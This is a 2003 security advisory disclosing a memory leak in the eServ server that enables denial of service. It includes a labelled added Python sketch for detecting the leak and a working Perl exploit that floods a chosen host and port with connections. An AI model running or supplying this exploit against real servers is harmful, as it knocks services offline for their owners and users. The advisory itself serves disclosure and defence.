[NT] eServ Memory Leak Enables Denial of Service Attacks
From: SecuriTeam (support_at_securiteam.com)
Date: 05/11/03
To: list@securiteam.com
Date: 11 May 2003 20:18:54 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
eServ Memory Leak Enables Denial of Service Attacks
------------------------------------------------------------------------
SUMMARY
<http://www.eserv.ru/> eServ is a "Mail, News, Web, FTP and Proxy
Servers". eServ's connection handling routine contains a memory leak that
may be exploited to make the eServ daemon unavailable. Upon
receiving a connection, the server allocates a block of memory on the heap
between 8 and 32 kilobytes in size. The reason for this size variance was
not isolated. The block is not freed on disconnect, so it leaks. After
several thousand successful connections, memory use on the system becomes
exceedingly high, and the system may become unusable.
DETAILS
Impact:
An attacker who can repeatedly establish connections with the eServ daemon
can cause services running on the vulnerable system (including other
services outside of eServ's process) to fail. The vulnerability can
actually be exploited by accident on high-traffic sites -- each connection
causes a leak. After about 1,000 connections, anywhere between 7.81 MB and
31.25 MB may leak.
To deprive an average server system of resources to the point of failure,
a significant number of connections is required. After 10,000 connections,
78.1 MB to 312.5 MB may leak; in my experience, about 50,000 connections
is sufficient to cause system failure. At this point, 390.5 MB to 1.52 GB
has leaked.
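An added example, not part of the original advisory: a Python sketch an operator could use to confirm a per-connection leak of this kind from monitoring data and estimate the remaining headroom. The sample figures, function names and the 512 MiB budget are constructed for illustration; only the 8 to 32 KB range comes from the advisory.

```python
from statistics import mean

KIB = 1024
# Per-connection leak range stated in the advisory (8 to 32 kilobytes).
LEAK_MIN, LEAK_MAX = 8 * KIB, 32 * KIB

# Constructed samples: (connections accepted so far, process private bytes).
SAMPLES = [
    (0, 12_000_000), (500, 22_300_000), (1000, 32_400_000),
    (1500, 42_900_000), (2000, 52_900_000), (2500, 63_200_000),
]

def fit_leak(samples):
    """Least-squares fit of memory use against connection count.

    Returns (bytes_per_connection, r_squared)."""
    xs = [c for c, _ in samples]
    ys = [m for _, m in samples]
    mx, my = mean(xs), mean(ys)
    sxx = sum((x - mx) ** 2 for x in xs)
    sxy = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    syy = sum((y - my) ** 2 for y in ys)
    if sxx == 0 or syy == 0:          # no traffic change, or perfectly flat memory
        return 0.0, 0.0
    return sxy / sxx, (sxy * sxy) / (sxx * syy)

def assess(samples, budget_bytes, min_r2=0.95):
    """Decide whether memory grows per connection and project the headroom."""
    slope, r2 = fit_leak(samples)
    leaking = slope > 0 and r2 >= min_r2
    result = {
        "bytes_per_connection": slope,
        "r_squared": r2,
        "leaking": leaking,
        "in_advisory_range": leaking and LEAK_MIN <= slope <= LEAK_MAX,
        "connections_until_budget": None,
    }
    if leaking:
        used = samples[-1][1]         # most recent memory reading
        result["connections_until_budget"] = max(0, int((budget_bytes - used) / slope))
    return result

if __name__ == "__main__":
    for key, value in assess(SAMPLES, 512 * KIB * KIB).items():
        print(f"{key}: {value}")
```

A high r_squared with a slope inside the 8 to 32 KB band means memory is tracking the connection count rather than load, which is the signature described above; a scheduled service restart before the projected connection count is a stopgap until the server is replaced.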
Vendor Contact
Matthew attempted to contact the vendor via info@eserv.ru and
support@eserv.ru. The former address bounced, and no response was received
from the second contact attempt. eServ has a horrible security record;
therefore, Matthew recommends using a production server for internet sites.
Exploit
#!/usr/bin/perl
#LEGAL NOTICE: Don't test this on networks you don't administer,
#and do not test this tool on networks you don't own without
#permission of the network owner. You are responsible for all
#damage due to your use of this tool.
use IO::Socket;
print "$0: eServ Remote DoS Exploit\r\n";
print "By Matthew Murphy <mattmurphy\@kc.rr.com>\r\n\r\n";
print "Server hostname: ";
# chomp() returns a count, not the string, so read first and strip in place.
chomp($host = <STDIN>);
$host =~ s/^\s+|\s+$//g;
print "Service port to probe: ";
chomp($port = <STDIN>);
$port =~ s/^\s+|\s+$//g;
print "\r\nBeginning probe -- stop with CTRL+C\r\n";
# Each completed connection leaves one unfreed heap block in the server.
while (1) {
    $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port");
    undef $f;    # drop the socket; the server does not free its block on disconnect
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:mattmurphy@kc.rr.com>
Matthew Murphy.
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.